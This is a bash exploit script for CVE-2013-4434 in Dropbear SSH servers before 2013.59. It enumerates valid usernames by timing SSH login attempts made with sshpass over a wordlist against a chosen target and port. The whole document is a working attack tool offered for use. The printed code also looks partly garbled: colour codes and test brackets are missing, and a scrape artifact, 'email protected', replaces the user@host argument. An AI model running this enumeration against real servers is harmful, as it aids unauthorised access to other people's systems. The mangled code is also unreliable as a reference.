#!/bin/bash # Affected Systems: Dropbear SSH Server before 2013.59 # CVE-ID: CVE-2013-4434 # Author: styx00 # Colours <3 RED='\0330;31m' GREEN='\0330;32m' BOLD=$(tput bold) RESET=$(tput sgr0) # Check if 'sshpass' is installed first dpkg -l "sshpass" > /dev/null 2>&1 INSTALLED=$? printf "Checking if the 'sshpass' package is installed...\n" if $INSTALLED == '0' ; then printf "${GREEN}${BOLD}+ The 'sshpass' package is installed. Let's proceed!${RESET}\n\n" else printf "${RED}${BOLD}- The 'sshpass' package is not installed.${RESET}\n\n" exit 1 fi # Function to show the script's usage function usage { printf "Usage: ./dropbear_CVE-2013.sh -t example.com -p 22 -w /home/styx00/usernames.txt" printf "\n\t-t, --target\tTarget FQDN or IP address" printf "\n\t-p, --port\tPort number" printf "\n\t-w, --wordlist\tWordlist containing usernames" printf "\n\t-h, --help\tShow help and exit\n" } while "$1" != "" ; do case $1 in -t | --target ) shift target=$1 ;; -p | --port ) shift port=$1 ;; -w | --wordlist ) shift wordlist=$1 ;; -h | --help ) usage exit ;; * ) usage exit 1 esac shift done if "$target" != "" && "$port" != "" && "$wordlist" != "" then printf "Target: %s\n" "${target}" printf "port: %s\n" "${port}" printf "Wordlist: %s\n" "${wordlist}" printf "\nTesting\n---------------\n" trap "exit" INT # Exit on SIGINT for username in $(cat $wordlist) do printf "\n${username}\n\t" /usr/bin/time --quiet -f "\tTime: %e" sshpass -p "password" ssh -T email protected$target -p $port </dev/null done printf "\n---------------\n" else usage fi